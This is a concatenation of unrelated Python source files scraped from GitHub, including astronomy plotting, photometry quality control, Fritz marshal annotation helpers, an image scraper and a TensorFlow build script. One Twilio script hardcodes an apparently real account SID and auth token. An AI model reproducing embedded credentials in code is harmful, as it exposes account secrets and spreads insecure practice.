Returns: timeseries (pandas.DataFrame): Copy of input but replace data with NaNs where QC fails. ALTERNATE: early return with FALSE if no channels pass QC. ''' ts_ = timeseries.copy() # always use z-scored data just for QC consistency y_cols = ts_.columns.intersection(['z_grnR', 'z_grnL']) # need different thresholds for dLight vs GRAB-DA qc_thresh = 2 if mouse in ['C32', 'C33', 'C34', 'C35'] else 5 y_cols = [col for col in y_cols if snr_photo_signal(ts_, col) < qc_thresh] if len(y_cols) == 2: print(f'insufficient photometry data...discarding {session_date}') return None for y_col in y_cols: ts_[y_col] = np.nan # NaNs for cols that don't pass QC if len(y_cols) == 2: ts_['z_grnDelta'] = ts_['z_grnR'] - ts_['z_grnL'] y_cols_pass = {'z_grnR', 'z_grnL'} - set(y_cols) return ts_, y_cols_pass def is_normal(ts, include_score=False, verbose=False, thresh_score=0, sensor='grabda_vls'): ''' Test for normality as a measure of signal to noise. Result of normally distributed data fails to pass QC protocol. Normality is determined via collective evaluation of skew, kurtosis, and K-S test p-value. Args: ts: Timeseries to be evaluated. include_score: Whether or not to include the number of metrics that passed as normally distributed. thresh_score: Threshold for permissable tests that return normality=True. Default of 1 means any test returning normal dist is sufficient to accept dist as normal (most conservative inclusion level). Returns: result: True if any metric is consistent with normal distribution. False if all metrics deviate from normal distribution. score: Number of metrics that are consistent with normal distribution (0 to 3). 
''' if ts is None: # needs to be a distribution to have signal return True thresholds = {'grabda_vls': (0.5, 0.8), 'grabda_dms': (0.1, 0.2)} skew_thresh, kurt_thresh = thresholds.get(sensor) skew = np.abs(ts.skew()) < skew_thresh kurtosis = np.abs(ts.kurtosis()) < kurt_thresh rand_normal = np.random.normal(0, np.nanstd(ts), len(ts)) _, p_value = scipy.stats.ks_2samp(ts, rand_normal, alternative="two-sided") ks_test = p_value > 0.05 score = sum((skew, kurtosis, ks_test)) # print(skew, kurtosis, ks_test) result = score > thresh_score if include_score: if verbose: print(f'skew = {np.abs(ts.skew())}\n', f'kurtosis = {np.abs(ts.kurtosis())}\n', f'p_value = {p_value}') return result, score else: if verbose: print(f'skew = {np.abs(ts.skew())}\n', f'kurtosis = {np.abs(ts.kurtosis())}\n', f'p_value = {p_value}') return result
celiaberon/neural-timeseries-analysis
nta/preprocessing/quality_control.py
quality_control.py
py
12,580
python
en
code
0
github-code
36
26626844923
import astropy.units as u
from astropy.coordinates.sky_coordinate import SkyCoord
from astropy.units import Quantity
from astropy.io.votable import parse
from astropy.table import Table
from matplotlib.colors import LogNorm
import matplotlib.pyplot as plt
import numpy as np

# Per-source mean extinction/excess table (columns include source_id, AG, EBminR).
extra_data = np.genfromtxt("Data/Mean_extinction_excess_SourceID_500pc_AG-4.4_BminR-1.7.dat", names = True, dtype=None)
source_id = extra_data['source_id']

# Full Gaia star sample within 500 pc.
readresults = Table.read('Data/All-star-500pc-AG-4.4-BminR-1.7.fits',format='fits')
results = np.array(readresults)

#Find the nonmatching source_id
# NOTE(review): this merge-walk assumes BOTH tables are sorted by source_id
# and that every id in `source_id` also appears in `results` -- otherwise the
# inner while loop can index past the end of `results`. TODO confirm.
nonmatches = np.array([])
j=0
for i in range(len(source_id)):
    not_found = True
    while not_found:
        if source_id[i]!=results['source_id'][j]:
            nonmatches = np.append(nonmatches,j)  # index of row lacking AG/EBminR
            j+=1
        else:
            not_found = False
            j+=1
print(j)

#Delete the rows with source_id that have no AG and EBminR
# `-k` compensates for rows already removed: each delete shifts later indices left.
for k in range(len(nonmatches)):
    results = np.delete(results,nonmatches[k]-k)

#Check if the deletion was succesful
# (re-runs the same walk; a second pass should report no nonmatches)
j=0
nonmatches_check = np.array([])
for i in range(len(source_id)):
    not_found = True
    while not_found:
        if source_id[i]!=results['source_id'][j]:
            nonmatches_check = np.append(nonmatches_check,j)
            j+=1
        else:
            not_found = False
            j+=1
print(j)

# De-reddened colour and extinction-corrected absolute G magnitude.
# NOTE(review): M_G = G + 5*log10(parallax) - 10 assumes parallax in mas -- confirm.
x=results['bp_rp']-extra_data['EBminR']
y_gaia=results['phot_g_mean_mag']+5*np.log10(results['parallax'])-10-extra_data['AG']
k=np.linspace(-4, 1, 1000)

# NOTE(review): `normed=True` was removed from matplotlib's hist2d in 3.x;
# modern versions require `density=True` -- confirm the matplotlib version used.
counts_gaia,xbins_gaia,ybins_gaia,image_gaia = plt.hist2d(x,y_gaia,bins=600,normed=True,norm=LogNorm(),cmap = plt.cm.jet)
plt.colorbar()
# Rough spectral-class boundaries drawn on the colour-magnitude diagram.
plt.vlines(x=0, ymin=-5, ymax=2,color=(1.0,0.2,0.3))
plt.vlines(x=0.33, ymin=-5, ymax=4,color=(1.0,0.2,0.3))
#plt.contour(counts_gaia.transpose(), extent=[xbins_gaia.min(),xbins_gaia.max(),ybins_gaia.min(),ybins_gaia.max()], colors='k', linewidth=0.01, levels = [0.1])
plt.text(-0.6, -3.5, 'OB')
plt.text(0.1, -3.5, 'A')
plt.plot(k,3*k+2.1,linestyle='-',color=(1.0,0.2,0.3))
plt.xlim(np.min(x),1.7)
plt.ylim(-4,4.4)
plt.xlabel(r'$(G_{BP}-G_{RP})-<E(B-R)>$')
plt.ylabel(r'$M_G-<A_G>$')
plt.gca().invert_yaxis()
plt.savefig('CM-Diagram_All-star-500pc-AG-4.4-BminR-1.7-Corrected_mean_AG_EBminR.png')
spacer730/Gaia_research
Queries-CM-Diagrams/CM-Diagram-corrected_mean_AG-EBminR .py
CM-Diagram-corrected_mean_AG-EBminR .py
py
2,142
python
en
code
0
github-code
36
31850440252
import matplotlib.pyplot as plt import numpy as np # x axis u = np.arange(0.0,2.74,0.01,dtype=np.cdouble) v = np.arange(2.74,5.0,0.01,dtype=np.cdouble) x = np.arange(0.0,5.0,0.01,dtype=np.cdouble) y = np.arange(0.0,3.83,0.01, dtype=np.cdouble) z = np.arange(3.83,5.0,0.01, dtype=np.cdouble) # y axis def f(t, option = 0): c = 1 b = np.sqrt(t ** 4 - 16 * t ** 2 + 20) a = -t ** 2 +8 if option % 2 == 1: b *= -1 if option > 1: c = -1 return c * np.sqrt(a+b)/np.sqrt(complex(22)) def g(t, option = 0): c = 1 b = np.sqrt(t ** 4 - 8 * t ** 2 + 4) a = 4 - t ** 2 if option % 2 == 1: b *= -1 if option > 1: c = -1 return c * np.sqrt(a+b)/np.sqrt(complex(6)) # use LaTeX fonts in the plot plt.rc('text', usetex=True) plt.rc('font', family='serif') n = plt.figure() # plot plt.subplot(2,1,1) for i in range(4): plt.plot(x, np.real(f(x,i)), color="black") plt.plot(x, np.real(g(x,i)), color="black") plt.axvline(x=0.733, color = "black", alpha = 0.5, dashes = (2,2)) plt.axvline(x=3.83, color = "black", alpha = 0.5, dashes = (2,2)) # set labels (LaTeX can be used) plt.title(r'\textbf{Symmetry Breaking}', fontsize=11) plt.ylabel(r'\textbf{Re[$\omega$]}', fontsize=11) plt.subplot(2,1,2) for i in range(4): plt.plot(y, np.imag(f(y,i)), color="black") plt.plot(z, np.imag(f(z,i)), color="black") plt.plot(u, np.imag(g(u,i)), color="black") plt.plot(v, np.imag(g(v,i)), color="black") # set labels (LaTeX can be used) plt.axvline(x=0.733, color = "black", alpha = 0.5, dashes = (2,2)) plt.axvline(x=3.83, color = "black", alpha = 0.5, dashes = (2,2)) plt.xlabel(r'\textbf{$\gamma$}', fontsize=11) plt.ylabel(r'\textbf{Im[$\omega$]}', fontsize=11) plt.show() # save as PDF n.savefig("pt_breaking.pdf",)
cesaregarza/QMResearch
plotter.py
plotter.py
py
1,812
python
en
code
0
github-code
36
27663638173
from typing import List class Solution: def isPalindrome(self, s: str) -> bool: s1 = ''.join(ch for ch in s if ch.isalnum()).lower() s2 = s1[::-1] return s1 == s2 def isPalindrome(self, s: str) -> bool: s1 = ''.join(ch for ch in s if ch.isalnum()).lower() s2 = s1[::-1] return s1 == s2 def isPalindrome_correct(self, s: str) -> bool: return 0 if __name__=="__main__": Solution = Solution() s = "A man, a plan, a canal: Panama" is_palimdrome = Solution.isPalindrome(s) print(is_palimdrome)
robertCho/LeetCode
Multiple Points/E125 Valid Palindrome.py
E125 Valid Palindrome.py
py
583
python
en
code
0
github-code
36
72215373865
# Download the helper library from https://www.twilio.com/docs/python/install from twilio.rest import Client # Your Account Sid and Auth Token from twilio.com/console # DANGER! This is insecure. See http://twil.io/secure account_sid = 'AC3f72ddfebffe2adae5b4efe0c6d9c9b6' auth_token = 'd45d3fcfab5be3e08985b77a3fd13103' client = Client(account_sid, auth_token) from twilio.rest import TwilioRestClient #填入你申请的号码 twilioNumber = '+19195253692' #填入你验证的手机号 myNumbers = ["+8618601156335", "+8618601156335", "+8618601156335", "+8613120090157", "+8613120090157"] #填入你想发送的信息 #Message message = 'Hi this is ravana!' client = Client(account_sid, auth_token) for myNumber in myNumbers: print("Sending", myNumber) msg = client.messages.create(to=myNumber, from_=twilioNumber, body=message) print(msg.sid) #Phone call: call = client.calls.create( url='http://demo.twilio.com/docs/voice.xml', to=myNumber, from_=twilioNumber) print(call.sid)
leemengwei/tasty_shrimp_skype
phone_with_twilio.py
phone_with_twilio.py
py
1,069
python
en
code
1
github-code
36
40861542036
import numpy as np from typing import List, Dict from math import ceil def _valleys(hist: Dict[int, int]) -> List[int]: """ Find the valleys of a histogram of gray levels Arguments: hist frequencies in the histogram of gray levels 0,1,...,L-1 (dictionary) Value: valleys returns an object with class 'list', list of integer values """ L = len(hist) toRight = list([False]*L) toLeft = list([False]*L) # Find when a frequency is less than or equal to the following one for i in range(0, L-1): toRight[i] = hist[i] <= hist[i+1] # Find when a frequency is less than the previous one for i in range(1, L): toLeft[i] = hist[i] < hist[i-1] # Find when both condition hold both = list(i and j for i, j in zip(toRight, toLeft)) val = list(i for i, x in enumerate(both) if x == True) return val def _valley_clustering(L: int, val: List[int]) -> np.ndarray: """ Find limits of the clusters of a histogram of gray levels according to given valleys Arguments: L number of gray levels 1,...,L val list of valleys Value: valley_clustering returns an object with class 'np.ndarray' """ # Find the amount of clusters n = len(val) + 1 clust = np.zeros((n, 2), dtype=np.uint8) # Find clusters clust[0] = [0, val[0] - 1] for i in range(1, n-1): clust[i] = [val[i-1], val[i] - 1] clust[n-1] = [val[n-2], L-1] return clust def _searching_window(clust: List[int]) -> np.ndarray: # Find length of the initial cluster n = clust[1] - clust[0] + 1 if n == 2: w = np.zeros((1, 2), dtype=np.uint16) w[0] = np.transpose(np.array(clust)) else: # Find length of the searching windows length = ceil(n / 2) total = n - length + 1 w = np.zeros((int(total), 2), dtype=np.uint16) # Find searching windows for j in range(total): w[j] = [clust[0] + j, ceil(clust[0] + j + length - 1)] return w
image-multithresholding/Image-multithresholding
src/image_multi_thresholding/thresholding_windows.py
thresholding_windows.py
py
2,140
python
en
code
1
github-code
36
15851928871
# python3 phbook = {} n = int(input()) for i in range(n): query = input().split() command = query[0] number = query[1] if command == "add": name = query[2] phbook[number] = name if command == "del": if number in phbook: phbook.pop(number) if command == "find": if number in phbook: print(phbook[number]) else: print("not found")
DA-testa/phone-book-DenissBondars
main.py
main.py
py
461
python
en
code
0
github-code
36
1141324769
# Helpers for posting SEDM spectrum comments, autoannotations,
# classifications and redshifts to the Fritz marshal (and TNS).
import re
import base64
import math
from glob import glob
from getpass import getpass
from pprint import pprint
from marshals.interface import api
import tns.sedm_auto_tns as tns

fritz_base_url = 'https://fritz.science/api/'
fritz_classification_url = fritz_base_url + 'classification'
fritz_redshift_update_url = fritz_base_url + 'sources/'


def add_spec_attachment(obj_id, comment, fname, spec_id=None, testing=False):
    """ adds a comment (not autoannotation) with attachment to a
    particular SEDM spectrum on the view_spec page, which will also
    appear elsewhere.

    obj_id: <str>
    comment: <str>
    fname: <str> path of the file to attach (base64-encoded into the payload)
    spec_id: <int>
    testing: <bool> are we just testing?

    return: True if success, False if not
    """
    if obj_id is None or spec_id is None:
        print("ERROR - Unable to get info required to post comment")
        return False

    # read in file and base64-encode it for the JSON payload
    with open(fname, 'rb') as image_file:
        encoded = base64.b64encode(image_file.read()).decode('ascii')

    # create payload
    ddict = {'obj_id': obj_id,
             'spectrum_id': spec_id,    # these go
             'text': comment,
             'attachment': {'body': encoded,
                            'name': fname.split('/')[-1]}}

    if testing:
        print("TESTING add_spec_attachment(): no data sent to marshal")
        print("%s: %s encoded with length %d" % (obj_id, fname.split('/')[-1],
                                                 len(encoded)))
        return True
    else:
        fritz_comment_url = fritz_base_url + 'spectra/%d/comments' % spec_id
        r = api("POST", fritz_comment_url, data=ddict)

        if 'success' in r['status']:
            r_data = r['data']
            if 'comment_id' in r_data:
                print("Comment id = %d" % int(r_data['comment_id']))
            print('{} uploaded'.format(fname.split('/')[-1]))
            return True
        else:
            print('error submitting comment with attachment')
            print(r['status'])
            print(r['message'])
            return False


def add_spec_autoannot(obj_id, andic, spec_id=None, origin=None,
                       testing=False):
    """ adds an autoannotation without attachment to a particular SEDM
    spectrum on the view_spec page, which will also appear elsewhere.

    obj_id: 'ZTF18aaaaaa', for example
    andic: <dict> of annotations
    spec_id: <int>
    origin: <str> giving origin of annotations
    testing: <bool> are we testing only?

    return: True if success, False if not
    """
    ddict = {'origin': origin,
             'data': andic}

    if testing:
        print("TESTING add_spec_autoannot(): no data sent to marshal")
        print(ddict)
        return True
    else:
        fritz_annotation_url = fritz_base_url + \
            'spectra/%d/annotations' % spec_id
        # fritz_annotation_url = fritz_base_url + \
        #     'sources/%s/annotations' % obj_id
        r = api("POST", fritz_annotation_url, data=ddict)

        if 'success' in r['status']:
            r_data = r['data']
            if 'annotation_id' in r_data:
                print("annotation id = %d" % int(r_data['annotation_id']))
            print('{}: {} posted'.format(obj_id, origin))
            return True
        else:
            print('error submitting annotation')
            print(r['status'])
            print(r['message'])
            return False


def add_SNIascore_pysedm_autoannot(fname, object_id=None, spec_id=None,
                                   testing=False, upload_tns=True):
    """ adds autoannotations with SNIASCORE and error
    if SNIASCORE > 0.9, also adds SNIASCORE redshift and error,
    posts an "Ia" classification and attempts a TNS upload

    fname: '*ZTF18aaaaaaa.txt' that has a bunch of
        "# SNIASCORE[something]: [val]" in the header
    object_id: (str)
    spec_id: (int)
    testing: (bool)
    upload_tns: (bool)

    returns: (annotation_posted, tns_uploaded) tuple of bools.
        NOTE(review): despite the original docstring, every return path
        yields a 2-tuple, not a bare bool -- confirm callers unpack it.
    """
    tns_upl = False
    ann_upl = False
    file_ext = fname.split('.')[-1]
    # NOTE(review): assert is stripped under `python -O`; an explicit raise
    # would be more robust input validation.
    assert file_ext == 'txt' or file_ext == 'ascii'
    # Parse "# KEY: value" header lines into a dict.
    with open(fname) as f:
        header = {line.split(':', 1)[0][1:].strip():
                  line.split(':', 1)[-1].strip()
                  for line in f if line[0] == '#'}

    # SNIascore RESULTS
    if 'SNIASCORE' not in header:
        print(fname, "never run through SNIascore?")
        return ann_upl, tns_upl
    if float(header['SNIASCORE']) < 0:
        # negative score is the "no score" sentinel
        print('no score')
        return ann_upl, tns_upl
    # construct annotations dictionary
    if float(header['SNIASCORE']) >= 0.9:
        # Post classification
        if add_SNIascore_classification(fname, object_id=object_id,
                                        testing=testing):
            print("POSTed Ia classification to fritz")
            # Attempt to post to TNS
            if upload_tns:
                try:
                    if tns.sedm_tns_classify(fname, ztfname=object_id,
                                             testing=testing):
                        print("Uploaded SNIa classification to TNS")
                        tns_upl = True
                    else:
                        print("Unable to upload SNIa classification to TNS")
                # NOTE(review): bare except also swallows KeyboardInterrupt /
                # SystemExit; `except Exception:` would be safer.
                except:
                    print("Problems connecting")
        else:
            print("Unable to post Ia classification to fritz")
        # Generate annotation dictionary (high-confidence: include redshift)
        andic = {
            'SNIascore': header['SNIASCORE'],
            'SNIascore_err': header['SNIASCORE_ERR'],
            'SNIa_z': header['SNIASCORE_Z'],
            'SNIa_z_err': header['SNIASCORE_ZERR']
        }
    else:
        # Low-confidence: annotate score only, no redshift
        andic = {
            'SNIascore': header['SNIASCORE'],
            'SNIascore_err': header['SNIASCORE_ERR']}
    # construct origin
    # origin = 'SNIascore:spc%d' % spec_id
    origin = 'sedm:SNIascore'
    print(andic)
    return add_spec_autoannot(object_id, andic, spec_id=spec_id,
                              origin=origin, testing=testing), tns_upl


def add_SNIascore_classification(fname, object_id=None, testing=False):
    """ adds SNIASCORE "Ia" classification if SNIASCORE > 0.9,
    and sets the source redshift from SNIascore when none is set yet

    fname: '*ZTF18aaaaaaa.txt' that has a bunch of
        "# SNIASCORE[something]: [val]" in the header
    object_id: (str)
    testing: (bool)

    returns: True if classification works, False (and it'll exit early)
    otherwise
    """
    file_ext = fname.split('.')[-1]
    assert file_ext == 'txt' or file_ext == 'ascii'
    # Parse "# KEY: value" header lines into a dict.
    with open(fname) as f:
        header = {line.split(':', 1)[0][1:].strip():
                  line.split(':', 1)[-1].strip()
                  for line in f if line[0] == '#'}

    # SNIascore RESULTS
    if 'SNIASCORE' not in header:
        print(fname, "never run through SNIascore?")
        return False
    if float(header['SNIASCORE']) < 0:
        print('no score')
        return False
    # construct annotations dictionary
    if float(header['SNIASCORE']) >= 0.9:
        cldict = {
            "obj_id": object_id,
            "classification": "Ia",
            "taxonomy_id": 3,
            "probability": float(header['SNIASCORE'])
        }
        if testing:
            print("TESTING add_SNIascore_classification():"
                  " no data sent to marshal")
            print(cldict)
            return True
        else:
            r = api("POST", fritz_classification_url, data=cldict)
            if 'success' in r['status']:
                r_data = r['data']
                if 'classification_id' in r_data:
                    print("classification id = %d" %
                          int(r_data['classification_id']))
                print('{}: Ia classification posted'.format(object_id))
                # now add redshift
                if 'SNIASCORE_Z' in header and 'SNIASCORE_ZERR' in header:
                    # What is the current redshift set to?
                    rc = api("GET", fritz_redshift_update_url + object_id)
                    if 'success' in rc['status']:
                        rc_data = rc['data']
                        current_redshift = None
                        if 'redshift' in rc_data:
                            current_redshift = rc_data['redshift']
                        # Only set redshift if it is not already set
                        if current_redshift is None:
                            new_redshift = float(header['SNIASCORE_Z'])
                            new_redshift_error = float(header['SNIASCORE_ZERR'])
                            # Round z to the decimal place implied by its error
                            try:
                                new_z_round = math.ceil(abs(
                                    math.log10(new_redshift_error)))
                            # Handle negative, NaN, Inf, None and <str> values
                            except (ValueError, OverflowError, TypeError):
                                new_z_round = 1
                            new_z = round(new_redshift,
                                          1 if new_z_round < 1 else new_z_round)
                            new_error = round(new_redshift_error,
                                              1 if new_z_round < 1
                                              else new_z_round)
                            rsdict = {"redshift": new_z,
                                      "redshift_error": new_error}
                            rr = api("PATCH",
                                     fritz_redshift_update_url + object_id,
                                     data=rsdict)
                            if 'success' in rr['status']:
                                print("redshift for %s updated to "
                                      "%.4f +- %.4f" %
                                      (object_id, rsdict['redshift'],
                                       rsdict['redshift_error']))
                            else:
                                print('error updating %s redshift' % object_id)
                                print(rr['status'])
                                print(rr['message'])
                        else:
                            print('Redshift for %s already set to %.4f' %
                                  (object_id, float(rc_data['redshift'])))
                    else:
                        print('error getting current redshift for %s' %
                              object_id)
                else:
                    print('No SNIascore redshift records found for %s '
                          % object_id)
                return True
            else:
                print('error submitting classification')
                print(r['status'])
                print(r['message'])
                return False
    # score in [0, 0.9): nothing posted
    return False


def add_SNID_pysedm_autoannot(fname, object_id=None, spec_id=None,
                              testing=False):
    """ if z < 0.3 and rlap > 5.0
    adds autoannotations with SNID rlap, z, type, etc
    adds a comment with the SNID plot attached

    fname: '*ZTF18aaaaaaa.txt' that has a bunch of
        "# SNIDMATCH[something]: [val]" in the header
    cred: ('username', 'password')
    reducedby: (str)
    testing: (bool)

    returns: True if all four comments/attachments works, False (and it'll
    exit early) otherwise
    """
    file_ext = fname.split('.')[-1]
    assert file_ext == 'txt' or file_ext == 'ascii'
    # Parse "# KEY: value" header lines; keys lower-cased for SNID lookups.
    with open(fname) as f:
        header = {line.split(':', 1)[0][1:].strip().lower():
                  line.split(':', 1)[-1].strip()
                  for line in f if line[0] == '#'}

    # Upload pysedm_report (glob()[0] raises IndexError when none exists)
    try:
        pysedm_report = glob(fname.replace('spec',
                                           'pysedm_report').replace('.txt',
                                                                    '.png'))[0]
        pr_posted = add_spec_attachment(object_id,
                                        'pysedm_report:spc%d' % spec_id,
                                        pysedm_report, spec_id=spec_id,
                                        testing=testing)
    except IndexError:
        print('no pysedm_report for {}?'.format(header['name']))
        pr_posted = False

    # SNID RESULTS
    if 'snidmatchtype' not in header:
        print(fname, "never run through snid?")
        return False
    if header['snidmatchtype'].lower() == 'none':
        print('no match')
        return False
    elif float(header['snidmatchrlap']) < 5:
        print('bad rlap, only {}'.format(header['snidmatchrlap']))
        return False
    elif (header['snidmatchtype'][0] == 'I') \
            and not (0.01 <= float(header['snidmatchredshift']) <= 0.3):
        # redshift sanity check only applies to SN types (I*)
        print('bad redshift, {snidmatchredshift} '
              'for {snidmatchtype}'.format(**header))
        return False

    # Combine type and subtype into a single match label.
    if header['snidmatchsubtype'] == '-':
        header['snidmatchmatch'] = header['snidmatchtype']
    else:
        header['snidmatchmatch'] = '-'.join([header['snidmatchtype'],
                                             header['snidmatchsubtype']])
    # construct annotations dictionary (defaults are overwritten below)
    andic = {'match': 'None', 'rlap': 0., 'redshift': 0., 'age': 0.}
    for key in andic:
        andic[key] = header['snidmatch' + key]
    # construct origin
    # origin = 'sedm:spc%d' % spec_id
    origin = 'sedm:SNID'
    if not add_spec_autoannot(object_id, andic, spec_id=spec_id,
                              origin=origin, testing=testing):
        return False
    if pr_posted:
        return True  # we already have an attachment comment so don't overwrite

    # SNID PLOT
    # NOTE: this makes a major assumption about the naming scheme of snid plots
    image_filename = fname.replace('.txt',
                                   '_{}.png'.format(header['snidmatchtype']))
    if not glob(image_filename):
        return False
    ret = add_spec_attachment(object_id, 'AUTO_SNID_plot', image_filename,
                              spec_id=spec_id, testing=testing)
    return ret


if __name__ == "__main__":
    auth = (input('GROWTH marshal username:'), getpass())
    successes = []
    for filename in glob('*ZTF?????????.txt'):
        # NOTE(review): `auth` is passed positionally as `object_id` here,
        # which does not match add_SNID_pysedm_autoannot's signature -- this
        # __main__ block looks stale (GROWTH-era credentials). TODO confirm.
        if add_SNID_pysedm_autoannot(filename, auth):
            print('success!')
            successes.append(re.findall(r'ZTF\d{2}[a-z]{7}', filename)[-1])
            break
    pprint(successes)
scizen9/sedmpy
fritz/fritz_commenter.py
fritz_commenter.py
py
14,311
python
en
code
5
github-code
36
625331659
import os
import time
from io import BytesIO

import aiohttp
import asyncio
import requests
from PIL import Image
from lxml import etree

# import pandas as pd


class Spider(object):
    """Async image scraper for apps.wow-trend.com.

    The download path is given at construction time, e.g. r'd:\test\\';
    that directory must already exist or an error is raised. To prefix the
    downloaded file names, append the prefix to the path, e.g.
    r'd:\test\abc' makes every file name start with "abc".
    The default path is a "downpic" directory under the current working
    directory; it is created automatically if missing.
    """

    def __init__(self, down_path=''):
        self.headers = {
            'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'
        }
        # running count of images written so far (also used as file name)
        self.num = 0
        if down_path == "":
            if 'downpic' not in os.listdir('.'):
                # "downpic" directory under the current directory
                os.mkdir('downpic')
            self.path = os.path.join(os.path.abspath('.'), 'downpic')
            os.chdir(self.path)  # switch into the download path
        self.down_path = down_path
        self.url = 'https://apps.wow-trend.com/api/trend/picture/get-list'
        self.params = {'nav_id': '35', 'gender_id': '72105', 'size': '60', 'page': '1', 'attrs': '[]'}

    def get_img_links(self, page, get_total_page=False):
        # Fetch the list of image records for one result page.
        self.params['page'] = str(page)
        # try:
        print('正在爬取页数:', page)
        r = requests.get(url=self.url, headers=self.headers, params=self.params)
        result = r.json()
        if get_total_page:
            return result['data']['totalPage']  # total number of pages
        urls_info = result['data']['list']
        print('本页{}张图片'.format(len(urls_info)))
        return urls_info
        # except Exception as e:
        #     print(e)

    async def get_sub_img_links(self, url):
        # Fetch a detail page and download its full-size image.
        # print(url)
        async with aiohttp.ClientSession(headers=self.headers) as session:
            r = await session.get(url)
            rtext = await r.text()
            el = etree.HTML(rtext)
            # Extract author information (name + code from the profile link).
            author_path = '//*[@id="__next"]/div/main/div[1]/div/div[3]/div[1]/div[1]/span[2]/a'
            author = el.xpath(author_path)[0]
            author_name = author.xpath('./text()')[0]
            author_code = author.xpath('./@href')[0].split('/')[-1]
            author_info = f'{author_name}_{author_code}'
            # print(author_info)
            # End of author information extraction.
            pic_xpath = '//*[@id="__next"]/div/main/div[1]/div/div[2]/div/div[1]/figure/img/@data-src'
            # NOTE(review): __download_img is not defined anywhere in this
            # file (only referenced in a commented-out line in run()) --
            # calling this method would raise AttributeError. TODO confirm.
            await self.__download_img(el.xpath(pic_xpath)[0], crop=True, prefix=author_info)

    def _write_img(self, file_name, content):
        # Write both a resized thumbnail and a cropped copy of the image.
        # if not crop:
        file_name_resize = os.path.join(self.down_path, '略缩图', file_name)
        self._resize_image(BytesIO(content), outfile=file_name_resize)
        # else:
        file_name_crop = os.path.join(self.down_path, '裁剪图', file_name)
        self._img_crop(BytesIO(content), output_fullname=file_name_crop)
        self.num += 1

    async def _get_content(self, link, filename=False):
        # `link` is the image URL; `filename` is the record id (or falsy).
        if link.startswith('//'):
            link = f'https:{link}'
        async with aiohttp.ClientSession() as session:
            # try:
            async with session.get(url=link) as response:
                content = await response.read()
                extend = link.split('.')[-1]
                if filename:
                    # NOTE(review): the literal "(unknown)" looks like a
                    # redacted placeholder -- the original probably used the
                    # `filename` value here. TODO confirm against upstream.
                    filename = f'(unknown).{extend}'
                else:
                    filename = f'{self.num}.{extend}'
                self._write_img(filename, content)
            # except (asyncio.TimeoutError, ClientPayloadError):
            #     pass

    def run(self, startpage=1, endpage=1):
        """Crawl result pages and download every listed image.

        startpage: first page to crawl, default 1
        endpage: last page, default 1; pass 0 to download ALL pages
        """
        start = time.time()
        if endpage == 0:
            # Ask the API for the real page count.
            endpage = self.get_img_links(1, get_total_page=True)
            print(f'总页数:{endpage}')
        for page in range(startpage, endpage + 1):
            # Fetch the image records that this page needs downloaded.
            picurls = self.get_img_links(page)
            # print(picurls)
            if picurls:
                # tasks = [asyncio.ensure_future(self.__download_img(picurl)) for picurl in picurls]
                tasks_crop = [asyncio.ensure_future(self._get_content(d['big_path'], d['id'])) for d in picurls]
                loop = asyncio.get_event_loop()
                loop.run_until_complete(asyncio.gather(*tasks_crop, return_exceptions=False))
        end = time.time()
        print(f"共运行了{(end - start):.0f}秒")

    def _resize_image(self, infile, outfile='', minsize=300, is_file=True):
        """Shrink an image so its smaller dimension equals `minsize`.

        infile: source image path, or an already-open PIL image when
            is_file is False
        outfile: output file name; if empty, the source is overwritten
        minsize: target size for the smaller of width/height
        """
        im = Image.open(infile) if is_file else infile
        if min(im.size) > minsize:
            x, y = im.size
            # Scale the longer side proportionally.
            if x < y:
                y = int(y * minsize / x)
                x = minsize
            else:
                x = int(x * minsize / y)
                y = minsize
            im = im.resize((x, y), 1)
        if not outfile:
            outfile = infile
        # Create the output directory if it does not exist yet.
        ckpath = os.path.dirname(outfile)
        if not os.path.exists(ckpath):
            os.makedirs(ckpath)
        im.save(outfile)

    def _img_crop(self, input_fullname, output_fullname):
        # Crop a square region whose side is the average of width and height,
        # positioned according to the image's aspect ratio, then resize it.
        # (Identifiers below are Chinese: 图片大小=image size, 比率=ratio,
        # 图片宽=width, 图片高=height, 矩形边长=square side length.)
        img = Image.open(input_fullname)
        图片大小 = img.size
        比率 = 图片大小[0] / 图片大小[1]
        图片宽 = 图片大小[0]
        图片高 = 图片大小[1]
        矩形边长 = (((图片宽 / 2) + (图片高 / 2)) * 2) / 4
        # For landscape images the crop height was once height*0.8 (legacy note).
        x1 = x2 = y1 = y2 = 0
        if 0.7 <= 比率 <= 1.4:
            # Roughly square image: crop near the bottom-left with 10% margins.
            x1 = 图片宽 * 0.1
            y1 = 图片高 - (矩形边长 + 图片高 * 0.1)
            x2 = x1 + 矩形边长
            y2 = 图片高 - (图片高 * 0.1)
        elif 比率 < 0.7:
            # Portrait image: smaller margins (5% / 2%).
            x1 = 图片宽 * 0.05
            y1 = 图片高 - (矩形边长 + 图片高 * 0.02)
            x2 = x1 + 矩形边长
            y2 = 图片高 - (图片高 * 0.02)
        elif 比率 > 1.4:
            # Landscape image: crop from the top-left corner.
            x1 = 图片宽 * 0.02
            y1 = 图片高 * 0.02
            x2 = x1 + 矩形边长
            y2 = y1 + 矩形边长
        cropped = img.crop((x1, y1, x2, y2))
        转换 = cropped.convert('RGB')
        self._resize_image(转换, outfile=output_fullname, is_file=False)


def main():
    # Entry point: crawl every page into d:\download.
    down_path = r'd:\download'
    spider = Spider(down_path)
    spider.run(startpage=1, endpage=0)
    print(f'共下载图片:{spider.num}')


if __name__ == '__main__':
    main()
chenxy2022/long
wow.py
wow.py
py
7,151
python
en
code
0
github-code
36
72547899303
# NOTE: `platform`, `call`, `get_bazel_version`, the venv helpers and the
# build_* functions all come from tools.build_utils via the star import.
from tools.build_utils import *
import os, shutil
import argparse


def main():
    '''Build TensorFlow (wheel + C++ library) for reuse by build_ovtf.py.

    Parses command-line options, verifies the bazel toolchain, prepares the
    output directory and a python virtualenv, clones or updates the
    TensorFlow sources, then builds the wheel and the C++ library and copies
    the artifacts into place.
    '''
    # Command line parser options
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(
        '--tf_version',
        type=str,
        help="TensorFlow tag/branch/SHA\n",
        action="store",
        default="v2.9.3")
    parser.add_argument(
        '--output_dir',
        type=str,
        help="Location where TensorFlow build will happen\n",
        action="store",
        required=True)
    parser.add_argument(
        '--target_arch',
        help=
        "Architecture flag to use (e.g., haswell, core-avx2 etc. Default \'native\'\n",
        default="native")
    parser.add_argument(
        '--use_intel_tensorflow',
        help="Build using Intel TensorFlow.",
        action="store_true")
    parser.add_argument(
        '--cxx11_abi_version',
